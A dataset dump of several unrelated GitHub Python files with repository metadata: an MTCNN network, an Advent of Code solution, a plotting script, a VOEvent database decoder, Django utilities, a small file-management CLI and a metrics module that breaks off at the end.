nn.Softmax(1))\n ]))\n # bounding box regression\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv5-2', nn.Linear(128, 4))\n ]))\n\n # lanbmark localization\n self.landmarks = nn.Sequential(OrderedDict([\n ('conv5-3', nn.Linear(128, 10))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n # backend\n x = self.body(x)\n\n # detection\n det = self.cls(x)\n box = self.box_offset(x)\n landmarks = self.landmarks(x)\n\n return {\n 'cls': det,\n 'pos_offset': box,\n 'key_point': landmarks\n }\n\n\nclass ONet(BaseNet):\n def __init__(self):\n super().__init__()\n\n def _init_net(self):\n # backend\n\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 32, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(32)),\n ('pool1', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv2', nn.Conv2d(32, 64, kernel_size=3, stride=1)),\n ('prelu2', nn.PReLU(64)),\n ('pool2', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv3', nn.Conv2d(64, 64, kernel_size=3, stride=1)),\n ('prelu3', nn.PReLU(64)),\n ('pool3', nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)),\n\n ('conv4', nn.Conv2d(64, 128, kernel_size=2, stride=1)),\n ('prelu4', nn.PReLU(128)),\n\n ('flatten', Flatten()),\n ('conv5', nn.Linear(1152, 256)),\n ('drop5', nn.Dropout(0.25)),\n ('prelu5', nn.PReLU(256)),\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv6-1', nn.Linear(256, 2)),\n # ('softmax', nn.Softmax(1))\n ]))\n # bounding box regression\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv6-2', nn.Linear(256, 4))\n ]))\n # lanbmark localization\n self.landmarks = nn.Sequential(OrderedDict([\n ('conv6-3', nn.Linear(256, 10))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n # backend\n x = self.body(x)\n\n # detection\n det = self.cls(x)\n\n # box regression\n box = self.box_offset(x)\n\n # landmarks regresion\n landmarks = self.landmarks(x)\n\n return {\n 'cls': det,\n 'pos_offset': box,\n 'key_point': landmarks\n }\n\n\nif __name__ == \"__main__\":\n p_net = PNet()\n r_net = RNet()\n o_net = ONet()\n\n x = torch.rand(size=(128, 3, 156, 48))\n o: dict = p_net(x)\n print('p-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n\n x = torch.rand(size=(128, 3, 24, 24))\n o: dict = r_net(x)\n print('r-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n\n x = torch.rand(size=(128, 3, 48, 48))\n o: dict = o_net(x)\n print('o-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n","repo_name":"diyage/AllYouNeed","sub_path":"Package/Task/FacialDetectionAndKeyPoints/MTCNN/Net.py","file_name":"Net.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70368820648","text":"import time\n\ndef parse(file_loc):\n \"\"\"\n read input to list\n :param file_loc: file path to AOC input.txt\n \"\"\"\n input = open(file_loc, \"r\").read().split('\\n')\n values=[]\n\n for line in input:\n values.append(line.split(' '))\n\n return values\n\ndef part_1(full_list):\n \"\"\"\n part 1: using the set function, given a list of passcodes we check that the length of the passcode is the\n same length as the set of the passcode\n \"\"\"\n count = 0\n for i in full_list:\n if len(i) == len(set(i)):\n count += 1\n\n return count\n\ndef part_2(full_list):\n \"\"\"\n part 2: To check for anagrams, we sort the characters in each of the string items in a passcode and then uses the\n same method as part 1\n \"\"\"\n count = 0\n for i in full_list:\n sorted_strings = []\n\n # sort the characters in a string\n for strings in i:\n sorted_strings.append(''.join(sorted(strings)))\n\n if len(sorted_strings) == len(set(sorted_strings)):\n count += 1\n\n return count\n\n\ndef main(file_loc):\n\n full_list = parse(file_loc)\n answer = part_1(full_list)\n answer2 = part_2(full_list)\n\n print(f'The answer to part 1 is: {answer}')\n print(f'The answer to part 1 is: {answer2}')\n\n return None\n\n\nif __name__ == '__main__':\n start_time = time.time()\n file_loc = 'input.txt'\n\n main(file_loc)\n\n end_time = time.time()\n print(f'Time taken:{(end_time - start_time)*1000} miliseconds')","repo_name":"siddharth1199/aoc_2017","sub_path":"optum_aoc/2017/day04/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39375922688","text":"import matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport numpy as np\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\nx = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\ny = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\nz = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n\ndef animate_frame(i):\n ax.clear()\n ax.scatter3D(x, y, z, c='r', marker='o')\n\nani = FuncAnimation(fig, animate_frame, frames=30, interval=1, repeat=False)\n\nplt.show()\n\n","repo_name":"sidharthmrao/SVM","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185286542","text":"'''\ndescription: Create a db entry for a VOEvent\nlicense: APACHE 2.0\nauthor: Ronald van Haren, NLeSC (r.vanharen@esciencecenter.nl)\n'''\nimport voeventparse as vp\nfrom pyfrbcatdb import dbase\nfrom pyfrbcatdb.FRBCat import FRBCat_add\nfrom pyfrbcatdb.FRBCat import parse_mapping\nfrom pyfrbcatdb.logger import logger\nfrom dateutil import parser\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n\nclass decode_VOEvent(logger):\n '''\n Class to decode a VOEvent file and insert it into the\n FRBCat database.\n\n :param voevent: filestream or filename\n :param dbName: database name\n :param dbHost: database host\n :param dbPort: database port\n :param dbUser: database user name\n :param dbPassword: database user password\n :param logfile: name of log file\n :type voevent: _io.BufferedReader, str\n :type dbName: str\n :type dbHost: str, NoneType\n :type dbPort: str, NoneType\n :type dbUser: str, NoneType\n :type dbPassword: str, NoneType\n :type logfile: str\n '''\n def __init__(self, voevent, dbName, dbHost, dbPort, dbUser,\n dbPassword, logfile):\n logger.__init__(self, logfile)\n self.dbName = dbName\n self.dbHost = dbHost\n self.dbPort = dbPort\n self.dbUser = dbUser\n self.dbPassword = dbPassword\n self.process_VOEvent(voevent)\n\n def process_VOEvent(self, voevent):\n '''\n Main method to process the VOEvent.\n\n :param voevent: filestream or filename\n :type voevent: _io.BufferedReader, str\n '''\n try:\n self.logger.info(\"Processing file {}\".format(voevent.name))\n except AttributeError:\n self.logger.info(\"Processing file {}\".format(voevent))\n # load mapping VOEvent -> FRBCAT\n mapping = parse_mapping()\n # parse VOEvent xml file\n vo_dict, event_type = self.parse_VOEvent(voevent, mapping)\n # create/delete a new FRBCat entry\n self.update_FRBCat(vo_dict, event_type)\n try:\n self.logger.info(\"Finished file {}\".format(voevent.name))\n except AttributeError:\n self.logger.info(\"Finished file {}\".format(voevent))\n\n @staticmethod\n def get_param(param_data, param_group, param_name):\n '''\n Get param data for a given attribute.\n\n :param param_data: all param data from VOEvent file\n :param param_group: param group in VOEvent which holds param_name\n :param param_name: name of parameter to get value for\n :type param_data: orderedmultidict.orderedmultidict.omdict\n :type param_group: str\n :type param_name: str\n :returns: param value if defined in VOEvent, else None\n :rtype: str, float, int, NoneType\n '''\n try:\n # return value of the param if defined in the XML\n return param_data.get(param_group).get(param_name).get('value')\n except AttributeError:\n # return None for the ones that are not defined in the XML\n return None\n\n @staticmethod\n def get_description(v, item):\n '''\n Return description of parameter.\n\n :param v: VOEvent xml\n :param item: single dictionary item from mapping\n :type v: lxml.objectify.ObjectifiedElement\n :type item: dict\n :returns: Description on parameter is applicable, else None\n :rtype: str, NoneType\n '''\n param_group = item.get('param_group')\n param_name = item.get('param_name')\n try:\n note = v.find(\".//Group[@name='{}']\".format(param_group)).find(\n \".//Param[@name='{}']\".format(param_name)).Description\n if note:\n return \"[{}] {}\".format(param_name, note)\n else:\n return None\n except AttributeError:\n return None\n\n @staticmethod\n def get_coord(v, coordname):\n '''\n Get coordinate from VOEvent file.\n - transform to HH:MM:SS if coordname=ra\n - transform to DD:HH:SS if coordname=dec\n\n :param v: VOEvent xml\n :param coordname: coordinate name ('ra' or 'dec')\n :type v: lxml.objectify.ObjectifiedElement\n :type coordname: str\n :returns: location string in HH:MM:SS.MS for coordname=ra\n or DD:HH:SS.MS for coordname=dec\n :rtype: str\n '''\n try:\n units = getattr(vp.get_event_position(v, index=0), 'units')\n except AttributeError:\n return None\n if not (units == 'deg'):\n raise AttributeError(\n 'Unable to determine units for position: {}'.format(\n vp.get_event_position(v, index=0)))\n position = vp.get_event_position(v, index=0)\n if (position.system == 'UTC-FK5-GEO'):\n skcoord = SkyCoord(ra=position.ra*u.degree,\n dec=position.dec*u.degree, frame='fk5')\n else:\n # use default reference frame\n skcoord = SkyCoord(ra=position.ra*u.degree,\n dec=position.dec*u.degree)\n if (coordname == 'ra'):\n # ra location is in hms\n coordloc = skcoord.ra.hms\n elif (coordname == 'dec'):\n # dec location is in dms\n coordloc = skcoord.dec.dms\n # format location tuple to string\n locstring = '{}:{}:{}'.format(\n str(int(round(coordloc[0]))).zfill(2),\n str(abs(int(round(coordloc[1])))).zfill(2),\n \"{:.2f}\".format(abs(coordloc[2])).zfill(5))\n return locstring\n\n @staticmethod\n def get_attrib(v, attribname):\n '''\n Get xml attributes.\n\n :param v: VOEvent xml\n :param attribname: attribute name\n :type v: lxml.objectify.ObjectifiedElement\n :type attribname: str\n :returns: v.attrib[attribname]\n :rtype: str\n '''\n try:\n return v.attrib[attribname]\n except ValueError:\n return None\n except KeyError:\n return None\n\n @staticmethod\n def get_utc_time_str(v):\n '''\n Get time in UTC.\n\n :param v: VOEvent xml\n :type v: lxml.objectify.ObjectifiedElement\n :returns: time as string 'YYYY-MM-DD HH:MM:SS.MS'\n :rtype: str\n '''\n utctime = vp.get_event_time_as_utc(v, index=0)\n return utctime.strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-3]\n\n def get_value(self, v, param_data, item, event_type):\n '''\n Extract the value of item from VOEvent.\n\n :param v: VOEvent xml\n :param param_data: all param data from VOEvent file\n :param item: single dictionary item from mapping\n :param event_type: event type of VOEvent, including\n citation if applicable, e.g. ('new', None)\n :type v: lxml.objectify.ObjectifiedElement, str\n :type param_data: orderedmultidict.orderedmultidict.omdict\n :type item: dict\n :type event_type: tuple\n :returns: value for item\n :rtype: int, float, str, bool, NoneType\n '''\n itemtype = item.get('type')\n if itemtype == 'ivorn':\n if (event_type[0] == 'supersedes'):\n if event_type[1]:\n # type supersedes with a valid ivorn citation\n return event_type[1]\n else:\n # type supersedes with no ivorn citation, use event ivorn\n return self.get_attrib(v, item.get('name'))\n else:\n return self.get_attrib(v, item.get('name'))\n elif itemtype == 'Param':\n return self.get_param(param_data, item.get('param_group'),\n item.get('param_name'))\n elif itemtype == 'ISOTime':\n try:\n return self.get_utc_time_str(v)\n except AttributeError:\n # for type 'retraction' there is no time defined\n return None\n elif itemtype == 'authortime':\n try:\n timestr = v.xpath('.//' +\n item.get('voevent').replace('.', '/'))[0]\n return parser.parse(str(timestr)).strftime('%Y-%m-%d %H:%M:%S')\n except IndexError:\n return None\n elif itemtype == 'XML':\n return vp.dumps(v)\n elif itemtype == 'voevent':\n try:\n return v.xpath('.//' +\n item.get('voevent').replace('.', '/'))[0]\n except IndexError:\n return None\n elif itemtype == 'Coord':\n return self.get_coord(v, item.get('name'))\n elif itemtype == 'verify':\n # get importance attribute from section\n importance = v.Why.attrib.get(item.get('name'))\n # for high importance set verified=True, else False\n try:\n if (float(importance) >= 0.95):\n # high importance, so default to verified\n return True\n else:\n return False\n except TypeError:\n return False\n else:\n return None\n\n def parse_VOEvent(self, voevent, mapping):\n '''\n Parse VOEvent xml file.\n\n :param voevent: VOEvent xml file\n :param mapping: mapping from mapping.json\n :type voevent: lxml.objectify.ObjectifiedElement, str\n :type mapping: dict\n :returns: mapping (mapping from mapping.json with values filled),\n event_type (event_type and citation if applicable)\n :rtype: dict, tuple\n '''\n # load VOEvent xml file\n try:\n v = vp.load(voevent)\n except AttributeError:\n f = open(voevent, \"rb\")\n v = vp.load(f)\n f.close()\n # assert if xml file is a valid VOEvent\n vp.assert_valid_as_v2_0(v)\n # Check if the event is a new VOEvent\n # For a new VOEvent there should be no citations\n try:\n event_type = (v.xpath('Citations')[0].EventIVORN.attrib['cite'],\n v.xpath('Citations')[0].EventIVORN.text)\n except IndexError:\n event_type = ('new', None)\n self.logger.info(\"Event of of type: {}\".format(event_type))\n # use the mapping to get required data from VOEvent xml\n # if a path is not found in the xml it gets an empty list which is\n # removed in the next step\n # puts all params into dict param_data[group][param_name]\n try:\n param_data = vp.get_grouped_params(v)\n except AttributeError:\n # section is not needed for retractions\n param_data = None\n for table in mapping.keys(): # iterate over all tables\n for idx, item in enumerate(mapping[table]):\n # Add values from XML to dictionary\n mapping[table][idx]['value'] = self.get_value(v, param_data,\n item, event_type)\n if item.get('description'):\n note = self.get_description(v, item)\n if note:\n mapping[table][idx]['note'] = note\n return mapping, event_type\n\n def update_FRBCat(self, mapping, event_type):\n '''\n Add new FRBCat entry. Calls the FRBCat_add class.\n\n :param mapping: mapping from mapping.json\n :param event_type: event_type and citation if applicable\n :type mapping: dict\n :type event_type: tuple\n '''\n # connect to database\n connection, cursor = dbase.connectToDB(self.dbName,\n self.dbUser,\n self.dbPassword,\n self.dbHost,\n self.dbPort)\n FRBCat = FRBCat_add(connection, cursor, mapping, event_type[0])\n if event_type[0] in ['new', 'followup', 'supersedes']:\n # for new, followup, supersedes we need to add an entry to FRBCat\n FRBCat.add_VOEvent_to_FRBCat()\n elif event_type[0] in ['retraction']:\n # retract the event\n FRBCat.retract(event_type[1])\n","repo_name":"TRASAL/frbcatdb","sub_path":"pyfrbcatdb/decode_VOEvent.py","file_name":"decode_VOEvent.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74365139689","text":"from datetime import datetime, timedelta\nfrom random import choice\nfrom django.conf import settings\nfrom rest_framework.exceptions import ValidationError\nfrom django.utils import timezone\nfrom pytz import timezone as pytztz\nfrom rest_framework.fields import DateTimeField\nimport json\nimport decimal\nimport time\nimport urllib\nimport uuid\n\ndef to_date_obj(date_string):\n for date_fmt in ('%m/%d/%Y', '%m-%d-%y', '%m/%d/%y', '%m-%d-%Y'):\n try:\n return datetime.strptime(date_string, date_fmt)\n except ValueError:\n pass\n raise ValidationError('Invalid date format, please enter in MM/DD/YYYY format')\n\ndef format_date(date):\n return date.strftime('%m/%d/%Y')\n\ndef to_datetime(timestamp_string, silent_fail=False, tz_info=None):\n for date_fmt in ('%m/%d/%Y %H:%M:%S', '%m-%d-%Y %H:%M:%s', '%m-%d-%y %H:%M:%s' , '%m/%d/%y %H:%M:%s', settings.COMMON_DATE, '%m/%d/%Y %I:%M:%S %p'):\n try:\n datetime_obj = datetime.strptime(timestamp_string, date_fmt)\n if tz_info:\n datetime_obj = datetime_obj.replace(tzinfo=pytztz(tz_info))\n return datetime_obj\n except (ValueError, TypeError) as e:\n raise ValidationError(e.message)\n if not silent_fail:\n raise ValidationError('Invalid date format, please enter in MM/DD/YYYY hh:mm:ss format')\n else:\n return None\n \ndef generate_random_string(length=8):\n \"\"\"\n Generates a random string\n \"\"\"\n string = \"THEQUICKBROWNFOXJUMPSOVERTHELAZYDOGthequickbrownfoxjumpsoverthelazydog.-_=$@#!1234567890\"\n l = lambda: choice(list(string))\n return ''.join(l() for s in range(length))\n\ndef generate_uuid(name):\n return uuid.uuid5(uuid.NAMESPACE_DNS, str(name))\n\n\n\n# def send_email(subject, message, recipient_list, fail_silently=True, auth_user=None,\n# auth_password=None, connection=None, html_message=None, attachments=None,\n# reply_to=None\n# ):\n# Mailer().delay(subject=subject, message=message, recipient_list=recipient_list,\n# fail_silently=fail_silently, auth_user=auth_user, auth_password=auth_password,\n# connection=connection, html_message=html_message, attachments=attachments,\n# from_email=settings.EMAIL_FROM_ADDRESS, reply_to=reply_to\n# )\n# return True\n\n# def is_iterable(obj):\n# iterable = True\n# try:\n# object_iterator = iter(obj)\n# except TypeError, te:\n# iterable = False\n# return iterable\n\n# def encrypt(message, key=None):\n# if not key:\n# key = settings.ENCRYPTION_KEY\n#\n# iv = Random.new().read(AES.block_size)\n# cipher = AES.new(key, AES.MODE_CFB, iv)\n# msg = iv + cipher.encrypt(message)\n# return msg.encode(\"hex\")\n#\n# def decrypt(cipher_text, key=None):\n# if not key:\n# key = settings.ENCRYPTION_KEY\n# iv = Random.new().read(AES.block_size)\n# cipher = AES.new(key, AES.MODE_CFB, iv)\n# return cipher.decrypt(cipher_text.decode(\"hex\"))[len(iv):]\n\ndef day_validator(value):\n if not 1 <= value <= 31:\n raise ValidationError('Invoice Date: Invalid date')\n\ndef string_to_int_list(string):\n \"\"\"\n Convert comma separated values of string of integers to list\n Eg: input \"12, 5,9, 24, qw, ssss\"\n output : [\"12\", \"5\", \"9\", \"24\"] \n \"\"\"\n return filter(lambda l: l.isdigit(), map(lambda d: d.strip(), string.split(',')))\n\ndef timestamped_filename(prefix, extension):\n params = [prefix] + list(timezone.now().timetuple()) + [extension]\n return r'{0}_{1}{2}{3}{4}{5}{6}{7}{8}{9}.{10}'.format(*params)\n\n\ndef split_name(name):\n \"\"\"\n Splits a name, returns as first name and last name\n \"\"\"\n first_name = last_name = \"\"\n names = filter(lambda t:t.strip(), name.split(' '))\n \n if names:\n first_name = \" \".join(names[:-1]) if len(names) > 1 else names[0]\n last_name = names[-1] if len(names) > 1 else \"\" \n \n return first_name, last_name\n\ndef to_int(obj):\n \"\"\"\n Converts any object to number,\n return None if conversion fails\n \"\"\"\n try:\n number = int(obj)\n except:\n number = None\n return number\n\ndef decode_number(number):\n return '+' + str(number)\n\nclass ZoneDateTimeField(DateTimeField):\n def to_representation(self, value):\n value = timezone.localtime(value)\n return super(ZoneDateTimeField, self).to_representation(value)\n\n\n\n\ndef check_file_extension(self, file_obj, allowed_extensions):\n is_valid_image = True\n \n file_name = str(file_obj)\n dot = file_name.rfind(\".\")\n extension = file_name[dot + 1:]\n if extension.lower() not in allowed_extensions:\n is_valid_image = False\n return is_valid_image\n\ndef geo_code(address):\n url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n params = urllib.urlencode({ 'address': address.encode('utf8'), 'key': settings.MAPS_API_KEY})\n try:\n response = json.loads(urllib.urlopen(''.join([url, params])).read())\n lat = response['results'][0]['geometry']['location']['lat']\n lng = response['results'][0]['geometry']['location']['lng']\n except Exception:\n lat = lng = None\n return lat, lng\n\n\nto_tags = lambda dictionary: [{'id':i, 'name':dictionary[i]} for i in dictionary]\n\n\ndef get_cache():\n return CacheManager.getInstance().cache\n\nclass DecimalEncoder(json.JSONEncoder):\n def _iterencode(self, o, markers=None):\n if isinstance(o, decimal.Decimal):\n # wanted a simple yield str(o) in the next line,\n # but that would mean a yield on the line with super(...),\n # which wouldn't work (see my comment below), so...\n return (str(o) for o in [o])\n return super(DecimalEncoder, self)._iterencode(o, markers)\n \ndef months_between_dates(from_date=None, to_date=None):\n if not (from_date and to_date):\n now = time.localtime()\n return [time.localtime(time.mktime((now.tm_year, now.tm_mon - n,\n 1, 0, 0, 0, 0, 0, 0)))[:2] for n in range(6)\n ]\n if not to_date:\n to_date = datetime.today()\n if not from_date:\n from_date = (to_date - timedelta(days=30 * 6)).date()\n iter_month = from_date.month\n iter_year = from_date.year\n months_list = []\n if from_date > to_date:\n from_date, to_date = to_date, from_date\n while not(iter_month == to_date.month and iter_year == to_date.year):\n months_list.append((iter_year, iter_month))\n iter_month += 1\n if iter_month > 12:\n iter_month = 1\n iter_year += 1\n months_list.append((iter_year, iter_month))\n return reversed(sorted(months_list, key=lambda x: (x[0], x[1]), reverse=True))\n","repo_name":"saikiranbojan/homely","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73136038247","text":"def solution(A,B):\n answer = 0\n A = sorted(A)\n B = sorted(B, reverse = True)\n for i in range(len(A)):\n a = A[0]\n b = B[0]\n answer += a * b\n del A[0]\n del B[0]\n return answer","repo_name":"juajang/algorithm","sub_path":"Math/최솟값 만들기.py","file_name":"최솟값 만들기.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1068361784","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom datetime import datetime\n\n\ndef create_parser():\n \"\"\"Creates parser for command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('command', type=str, nargs='*', help='sd')\n return parser\n\n\ndef ls(pathname):\n \"\"\"Command ls.\"\"\"\n if pathname == '':\n pathname = '.'\n return set(os.listdir(pathname)) # noqa: C405\n\n\ndef mk(filename):\n \"\"\"Command mk.\"\"\"\n file_exists = os.path.isfile(filename)\n\n if file_exists:\n return ['error']\n\n try:\n open(filename, 'w').close() # noqa: WPS515\n except Exception:\n return ['error']\n\n return ['create {0}'.format(filename)]\n\n\ndef rm(filename):\n \"\"\"Command rm.\"\"\"\n file_exists = os.path.isfile(filename)\n if file_exists:\n os.remove(filename)\n return ['remove {0}'. format(filename)]\n\n forder_exist = os.path.isdir(filename)\n if forder_exist:\n os.rmdir(filename)\n return ['remove {0}'. format(filename)]\n\n return ['no file or directory to remove']\n\n\ndef contains(path):\n \"\"\"Command contains.\"\"\"\n if path in os.listdir():\n return ['code: 0']\n return ['code: 1']\n\n\ndef since(date, path='.'):\n \"\"\"Command since.\"\"\"\n try:\n date = datetime.strptime(date, '%d-%m-%Y')\n except Exception:\n return set([]) # noqa: C405\n if os.path.isdir(path):\n listdir = os.listdir(path)\n return set([ # noqa: C403\n itm for itm in listdir\n if date < datetime.fromtimestamp(\n os.path.getctime('{0}/{1}'.format(path, itm)),\n )\n ])\n return set([]) # noqa: C405\n\n\ndef main():\n \"\"\"Command to start.\"\"\"\n console_input = create_parser().parse_args().command\n if len(console_input) == 1:\n command = console_input[0]\n argument = ''\n else:\n command, argument = console_input\n\n command_result = globals()[command](argument) # noqa: WPS421\n for res in command_result:\n print(res) # noqa: T001\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sobolevn/itmo-2019","sub_path":"students/revyakinpetr/3/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72557272487","text":"import torch\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\n\ndef compute_metrics(metric_fns,\n prediction,\n target,\n unique_labels=None,\n save_mean=True):\n '''\n Given list of metric functions, calculate metrics for given predictions and targets\n Arg(s):\n metric_fns : list[functions]\n list of metrics to compute\n prediction : N-length np.array or torch.tensor\n model predictions\n target : N-length np.array or torch.tensor\n ground truth values\n unique_labels : list[int] or C-length np.array\n sequence of unique labels\n save_mean : bool\n if True, store the average for all per class metrics as well\n\n Returns:\n metrics dict{str : np.array}\n '''\n\n # Create list of metric function names\n metric_fn_names = set()\n for fn in metric_fns:\n metric_fn_names.add(fn.__name__)\n\n # Data structure to store calculated metrics\n metrics = {}\n\n # Convert tensors -> arrays if necessary\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n # Obtain unique labels if not provided\n if unique_labels is None:\n n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n unique_labels = [i for i in range(n_classes)]\n else:\n n_classes = len(unique_labels)\n\n # Make confusion matrix (rows are true, columns are predicted)\n assert prediction.shape[0] == target.shape[0]\n cmat = confusion_matrix(\n target,\n prediction,\n labels=unique_labels)\n\n # Calculate TP, TN, FP, and FN for each class\n total = np.sum(cmat)\n TPs = np.diag(cmat)\n FPs = np.sum(cmat, axis=0) - TPs\n FNs = np.sum(cmat, axis=1) - TPs\n TNs = total - (TPs + FPs + FNs)\n\n # Store in metrics\n metrics[\"TP\"] = TPs\n metrics[\"TN\"] = TNs\n metrics[\"FPs\"] = FPs\n metrics[\"FNs\"] = FNs\n\n # store whether or not we want to calculate f1\n calculate_f1 = False\n for metric_fn in metric_fns:\n # Obtain metric name\n metric_name = metric_fn.__name__\n\n # Wait to calculate f1 because it depends on precision and recall\n if metric_name == \"f1\":\n calculate_f1 = True\n continue\n\n # Special case for accuracy, predicted_class_distribution\n if metric_name == 'accuracy':\n metrics['accuracy'] = accuracy(prediction, target)\n continue\n elif metric_name == 'predicted_class_distribution':\n metrics[metric_name] = predicted_class_distribution(prediction, n_classes=n_classes)\n continue\n\n # Calculate metric & store\n metric = metric_fn(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n metrics[metric_name] = metric\n\n # Save average if desired\n if save_mean:\n mean_metric = np.mean(metric)\n metrics[\"{}_mean\".format(metric_name)] = mean_metric\n\n if calculate_f1:\n # Ensure we have values for precision and recall\n if 'precision' not in metrics:\n precisions = precision(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n else:\n precisions = metrics['precision']\n if 'recall' not in metrics:\n recalls = recall(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n else:\n recalls = metrics['recall']\n\n # Calculate and store f1\n f1_score= f1(\n precisions=precisions,\n recalls=recalls)\n metrics['f1'] = f1_score\n if save_mean:\n metrics[\"f1_mean\"] = np.mean(f1_score)\n\n return metrics\n\ndef per_class_accuracy(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class accuracy\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs : C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n per_class_accuracies : C-length np.array\n per class accuracy = (TP + TN) / (TP + FP + TN + FN)\n '''\n return np.nan_to_num((TPs + TNs) / (TPs + TNs + FPs + FNs))\n\ndef precision(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class precision\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs : C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n precisions : C-length np.array\n precision = TP / (TP + FP)\n '''\n return np.nan_to_num(TPs / (TPs + FPs))\n\ndef recall(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class recall\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs : C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n recall : C-length np.array\n recall = TP / (TP + FN)\n '''\n return np.nan_to_num(TPs / (TPs + FNs))\n\ndef f1(precisions, recalls):\n '''\n Given precision and recall for each class,\n calculate f1 score per class\n\n Arg(s):\n precisions : C-length np.array\n precisions for each class\n recalls : C-length np.array\n recalls for each class\n\n Returns:\n f1s : C-length np.array\n f1 = 2 * precision * recall / (precision + recall)\n '''\n return np.nan_to_num(2 * precisions * recalls / (precisions + recalls))\n\ndef accuracy(prediction, target):\n '''\n Return accuracy\n Arg(s):\n prediction : N x 1 torch.tensor\n logit outputs of model\n target : N x 1 torch.tensor\n integer labels\n Returns:\n float : accuracy of predictions\n\n '''\n\n assert len(prediction.shape) == 1, \"Prediction must be 1-dim array, received {}-shape array.\".format(prediction.shape)\n assert len(target.shape) == 1, \"Target must be 1-dim array, received {}-shape array.\".format(target.shape)\n\n # Convert to numpy arrays\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n correct = np.sum(prediction == target)\n return correct / len(target)\n\n\ndef predicted_class_distribution(prediction, n_classes=10):\n '''\n Given a list of predictions, return a counts of number predictions in each class\n\n Arg(s):\n prediction : 1D np.array or torch.tensor\n class prediction for each sample\n\n Returns:\n class_distribution : 1D np.array with length = # classes\n '''\n # Convert to numpy arrays\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n\n class_distribution = np.bincount(prediction, minlength=n_classes)\n return class_distribution\n\ndef accuracy_from_outputs(output, target):\n '''\n Return accuracy\n Arg(s):\n output : N x C torch.tensor\n logit outputs of model\n target : N x 1 torch.tensor\n integer labels\n Returns:\n float : accuracy of predictions\n\n '''\n with torch.no_grad():\n pred = torch.argmax(output, dim=1)\n assert pred.shape[0] == len(target)\n correct = 0\n correct += torch.sum(pred == target).item()\n return correct / len(target)\n\ndef _accuracy(output, target):\n print(\"helper acc\")\n with torch.no_grad():\n pred = torch.argmax(output, dim=1)\n assert pred.shape[0] == len(target)\n correct = 0\n correct += torch.sum(pred == target).item()\n return torch.tensor([correct]), torch.tensor([len(target)])\n\n\ndef top_k_acc(output, target, k=3):\n with torch.no_grad():\n pred = torch.topk(output, k, dim=1)[1]\n assert pred.shape[0] == len(target)\n correct = 0\n for i in range(k):\n correct += torch.sum(pred[:, i] == target).item()\n return correct / len(target)\n\n# This was actually calculating recall\n# def 